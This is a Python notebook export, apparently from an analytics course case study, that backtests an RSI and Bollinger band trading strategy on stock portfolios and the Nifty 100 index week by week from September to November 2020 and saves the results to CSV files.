week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
week_start = week_start_dates [i]
week_end = week_end_dates [i]
mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
weekly_data = daily_data.loc[mask]
weekly_data_selected = weekly_portfolio1_stock_selection (weekly_data)
week_number = str("Week".join(str(i)))
if i == 0:
available_money = portfolio_money
weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
available_money = money_available
i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
add_rows_list.append(week_number)
date = "2020-10-01"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
add_rows_list.append(week_number)
date = "2020-10-01"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Sep", "Portfolio1: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# PORTFOLIO 3
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
week_start = week_start_dates [i]
week_end = week_end_dates [i]
mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
weekly_data = daily_data.loc[mask]
weekly_data_selected = weekly_portfolio3_stock_selection (weekly_data)
week_number = str("Week".join(str(i)))
if i == 0:
available_money = portfolio_money
weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
available_money = money_available
i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
add_rows_list.append(week_number)
date = "2020-10-01"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
add_rows_list.append(week_number)
date = "2020-10-01"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Sep", "Portfolio3: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# store the data in an excel
Buy_Sell_Summary_r.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Summary Portfolio1 Sep-20.csv')
concat_Buy_Sell.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Txn details Portfolio1 Sep-20.csv')
# +
## DO THE TESTING FOR NIFTY FOR THE MONTH OF SEP2020
# -
# TESTING FOR 31-Aug until 01-Oct 2020 - NIFTY
# RSI>25 and Bollinger - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
def weekly_nifty_buy_and_sell (weekly_data_nifty, week_num, weekly_money):
weekly_data_nifty['TradingStrategyRSI_revised'] = np.where(weekly_data_nifty['rsi'] > 25, "positive", "negative")
df_nifty = weekly_data_nifty
Back_Test_10yrs = []
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
next_step = 1 # 1 - Buy, 0 - Sell
total_buy_value = 0
total_sell_value = 0
qty = 0
for row_index, row in df_nifty.iterrows():
buy_value = 0
sell_value = 0
if i <= df_nifty.index[-1] :
if next_step == 0:
if df_nifty.loc[row_index, 'TradingStrategyBollinger'] == "Sell":
if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "negative":
Back_Test_10yrs.append(week_num)
Back_Test_10yrs.append(row['Date'])
Back_Test_10yrs.append("Sell")
Back_Test_10yrs.append(row['Close'])
Back_Test_10yrs.append(number_stock)
sell_value = number_stock * row['Close']
Back_Test_10yrs.append(sell_value)
total_sell_value = total_sell_value + sell_value
next_step = 1
j = j + 1
else: # first time I have to buy
if weekly_money > 0:
if df_nifty.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
number_stock = portfolio_money // row['Close'] # floor division to get the integer number of stocks
Back_Test_10yrs.append(week_num)
Back_Test_10yrs.append(row['Date'])
Back_Test_10yrs.append("Buy")
Back_Test_10yrs.append(row['Close'])
Back_Test_10yrs.append(number_stock)
buy_value = number_stock * row['Close']
Back_Test_10yrs.append(buy_value)
total_buy_value = total_buy_value + buy_value
next_step = 0
j = j + 1
i = i + 1
Back_Test_10yrs
weekly_money = weekly_money + total_sell_value - total_buy_value
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 6
Buy_Sell_list = list(divide_chunks(Back_Test_10yrs, n))
# move the list to dataframe
Buy_Sell_dataframe_nifty_w = pd.DataFrame(Buy_Sell_list)
Buy_Sell_dataframe_nifty_w
return(Buy_Sell_dataframe_nifty_w, weekly_money)
## FOR TESTING FOR THE PERIOD FROM 31-AUG-2020 until 01-OCT-2020
## SELECT THE DAILY_DATA TO REFLECT JUST THIS DATA AND NOT THE DATA UNTIL 31-AUG-2020
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
week_start = week_start_dates [i]
week_end = week_end_dates [i]
mask = ((daily_nifty100['Date'] >= week_start) & (daily_nifty100['Date'] <= week_end))
weekly_data_nifty100 = daily_nifty100.loc[mask]
week_number = str("Week".join(str(i)))
if i == 0:
available_money = portfolio_money
weekly_portfolio, money_available = weekly_nifty_buy_and_sell(weekly_data_nifty100, week_number, available_money)
consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
available_money = money_available
i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
consolidated_portfolio
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
last_txn = consolidated_portfolio.tail(1)[2] # pick the second column - pertaining to transaction
if (last_txn == "Buy").bool():
add_rows_list.append(i)
date = "2020-10-01"
add_rows_list.append(date) # Date
add_rows_list.append("Sell") # Sell
price = daily_nifty100['Close'].tail(1).values[0]
add_rows_list.append(price) # Close price per the last date for that stock
qty = consolidated_portfolio.tail(1)[4].values[0] # Qtyfor last date of that stock
add_rows_list.append(qty) # qty
value = price * qty
add_rows_list.append(value)
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Txn Price Qty
concat_Buy_Sell = pd.DataFrame( np.concatenate( (consolidated_portfolio.values, add_rows_df.values), axis=0 ) )
concat_Buy_Sell.columns = [ 'Week#', 'Date', 'Txn', 'Close', 'Qty', 'Value' ]
# -
## Summarize per the requirement
Line1 = "I am Rajesh. My portfolio has"
Line2 = "stocks. These are: "
Stock_list = portfolio_stock_name
Num_stocks = portfolio_num_stock
# convert list to string for stock_list
def ListToString (s):
str1 = ""
for ele in s: # traverse the string
str1 += ele
str1 += " "
return str1
stock_string = ListToString(Stock_list)
# #### SUMMARIZATION FOR SEP'20 BASED ON STOCK PORTFOLIO & NIFTY
concat_header = Line1 + str(Num_stocks) + Line2 + stock_string
concat_header
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Nifty - Sep", "Portfolio2: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# store the data in an excel
Buy_Sell_Summary_r.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Summary Sep-20.csv')
concat_Buy_Sell.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Txn details Sep-20.csv')
# ## PROCESS THE OCT AND NOV DATA
# ### process the stock information
## data selection for each week
week_start_dates = ['2020-10-05', '2020-10-12', '2020-10-19', '2020-10-26', '2020-11-02', '2020-11-09', '2020-11-16', '2020-11-23']
week_end_dates = ['2020-10-09', '2020-10-16', '2020-10-23', '2020-10-30', '2020-11-06', '2020-11-13', '2020-11-20', '2020-11-27']
mask = ((daily_data['Date'] >= '2020-10-05') & (daily_data['Date'] <= '2020-11-27'))
daily_data_oct_nov_2020 = daily_data.loc[mask]
week_end = week_end_dates[0]
week_start_dates = ['2020-10-05', '2020-10-12', '2020-10-19', '2020-10-26', '2020-11-02', '2020-11-09', '2020-11-16', '2020-11-23']
week_end_dates = ['2020-10-09', '2020-10-16', '2020-10-23', '2020-10-30', '2020-11-06', '2020-11-13', '2020-11-20', '2020-11-27']
#week_start_dates = ['2010-01-04']
#week_end_dates = ['2020-08-31']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
week_start = week_start_dates [i]
week_end = week_end_dates [i]
mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
weekly_data = daily_data.loc[mask]
weekly_data_selected = weekly_portfolio_stock_selection (weekly_data)
week_number = str("Week".join(str(i)))
if i == 0:
available_money = portfolio_money
weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
available_money = money_available
i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
add_rows_list.append(week_number)
date = "2020-11-27"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
add_rows_list.append(week_number)
date = "2020-11-27"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Oct/Nov", "Portfolio2: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# store the data in an excel
Buy_Sell_Summary_r.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Summary Oct_Nov-20.csv')
concat_Buy_Sell.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Txn details Oct_Nov-20.csv')
# PORTFOLIO 1
week_start_dates = ['2020-10-05', '2020-10-12', '2020-10-19', '2020-10-26', '2020-11-02', '2020-11-09', '2020-11-16', '2020-11-23']
week_end_dates = ['2020-10-09', '2020-10-16', '2020-10-23', '2020-10-30', '2020-11-06', '2020-11-13', '2020-11-20', '2020-11-27']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
week_start = week_start_dates [i]
week_end = week_end_dates [i]
mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
weekly_data = daily_data.loc[mask]
weekly_data_selected = weekly_portfolio1_stock_selection (weekly_data)
week_number = str("Week".join(str(i)))
if i == 0:
available_money = portfolio_money
weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
available_money = money_available
i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
add_rows_list.append(week_number)
date = "2020-11-27"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
add_rows_list.append(week_number)
date = "2020-11-27"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Oct/Nov", "Portfolio1: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# PORTFOLIO 3
week_start_dates = ['2020-10-05', '2020-10-12', '2020-10-19', '2020-10-26', '2020-11-02', '2020-11-09', '2020-11-16', '2020-11-23']
week_end_dates = ['2020-10-09', '2020-10-16', '2020-10-23', '2020-10-30', '2020-11-06', '2020-11-13', '2020-11-20', '2020-11-27']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
week_start = week_start_dates [i]
week_end = week_end_dates [i]
mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
weekly_data = daily_data.loc[mask]
weekly_data_selected = weekly_portfolio3_stock_selection (weekly_data)
week_number = str("Week".join(str(i)))
if i == 0:
available_money = portfolio_money
weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
available_money = money_available
i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
add_rows_list.append(week_number)
date = "2020-11-27"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
add_rows_list.append(week_number)
date = "2020-11-27"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Oct/Nov", "Portfolio3: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# #### TEST FOR NIFTY 100 - OCT-NOV 2020
## FOR TESTING FOR THE PERIOD FROM 05-OCT-2020 until 27-NOV-2020 - NIFTY100
## SELECT THE DAILY_DATA TO REFLECT JUST THIS DATA AND NOT THE DATA UNTIL 02-OCT-2020
week_start_dates = ['2020-10-05', '2020-10-12', '2020-10-19', '2020-10-26', '2020-11-02', '2020-11-09', '2020-11-16', '2020-11-23']
week_end_dates = ['2020-10-09', '2020-10-16', '2020-10-23', '2020-10-30', '2020-11-06', '2020-11-13', '2020-11-20', '2020-11-27']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
week_start = week_start_dates [i]
week_end = week_end_dates [i]
mask = ((daily_nifty100['Date'] >= week_start) & (daily_nifty100['Date'] <= week_end))
weekly_data_nifty100 = daily_nifty100.loc[mask]
week_number = str("Week".join(str(i)))
if i == 0:
available_money = portfolio_money
weekly_portfolio, money_available = weekly_nifty_buy_and_sell(weekly_data_nifty100, week_number, available_money)
consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
available_money = money_available
i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
last_txn = consolidated_portfolio.tail(1)[2] # pick the second column - pertaining to transaction
if (last_txn == "Buy").bool():
add_rows_list.append(i)
date = "2020-11-27"
add_rows_list.append(date) # Date
add_rows_list.append("Sell") # Sell
price = daily_nifty100['Close'].tail(1).values[0]
add_rows_list.append(price) # Close price per the last date for that stock
qty = consolidated_portfolio.tail(1)[4].values[0] # Qtyfor last date of that stock
add_rows_list.append(qty) # qty
value = price * qty
add_rows_list.append(value)
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Txn Price Qty
concat_Buy_Sell = pd.DataFrame( np.concatenate( (consolidated_portfolio.values, add_rows_df.values), axis=0 ) )
concat_Buy_Sell.columns = [ 'Week#', 'Date', 'Txn', 'Close', 'Qty', 'Value' ]
# -
consolidated_portfolio.rename(columns={"0" : "Week#", "1" : "Date", "2" : "Txn", "3" : "Close", "4" : "Qty", "5" : "Value"})
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Nifty - Oct/Nov", "Portfolio1: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
